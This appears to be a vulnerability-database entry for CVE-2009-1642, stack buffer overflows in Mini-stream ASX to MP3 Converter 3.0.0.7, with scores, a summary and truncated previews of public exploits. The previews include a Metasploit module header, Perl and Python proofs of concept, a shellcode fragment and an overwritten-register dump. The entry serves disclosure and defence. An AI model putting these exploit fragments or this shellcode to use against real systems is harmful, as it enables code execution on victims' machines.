9.3
CVSSv2

CVE-2009-1642

Published: 15/05/2009 Updated: 12/10/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 960
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote malicious users to execute arbitrary code via (1) a long rtsp URL in a .ram file and (2) a long string in the HREF attribute of a REF element in a .asx file. NOTE: the latter was also subsequently reported in "before 3.1.3.7."

Vulnerable Product Search on Vulmon Subscribe to Product

mini-stream mini-stream to mp3 converter 3.0.0.7

Exploits

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking inc ...
#!/usr/bin/python import time # ASX to MP3 Converter Version 300100 => Local stack overflow exploit # Author: Hazem Mofeed # PoC: wwwexploit-dbcom/exploits/11930 # Tested On: Windows Xp Home Edition SP3 # Home: hakxerwordpresscom print ' Exploited by Hazem Mofeed \n' print ' ASX to MP3 Converter Version 300100 => Loc ...
#!/usr/bin/python # # Title: Shadow Stream Recorder 3017 (asx) Local Buffer Overflow # Date: 03-29-2010 # Author: b0telh0 # Link: wwwrm-to-mp3net/downloads/ssrecordersetupexe # Tested on: Windows XP SP3 # # windows/exec - 228 bytes # EXITFUNC=seh, CMD=calcexe # shellcode = ("\xda\xd6\xbe\xc4\x14\x6b\x17\x31\xc9\xd9\x74\x24\xf4\x58 ...
#!/usr/bin/perl # ASX to MP3 Converter Version 300100 Local Stack Overflow POC # Exploited By mat # #EAX 00000001 #ECX 41414141 #EDX 00D30000 #EBX 00333ED8 #ESP 000F6C90 #EBP 000FBFB4 #ESI 77C2FCE0 msvcrt77C2FCE0 #EDI 00006619 #EIP 41414141 ################################################################### my $ex="""\x41" x 26121; ### ...
#!/usr/bin/perl =gnk ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | ...
#!/usr/bin/perl =gnk ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | ...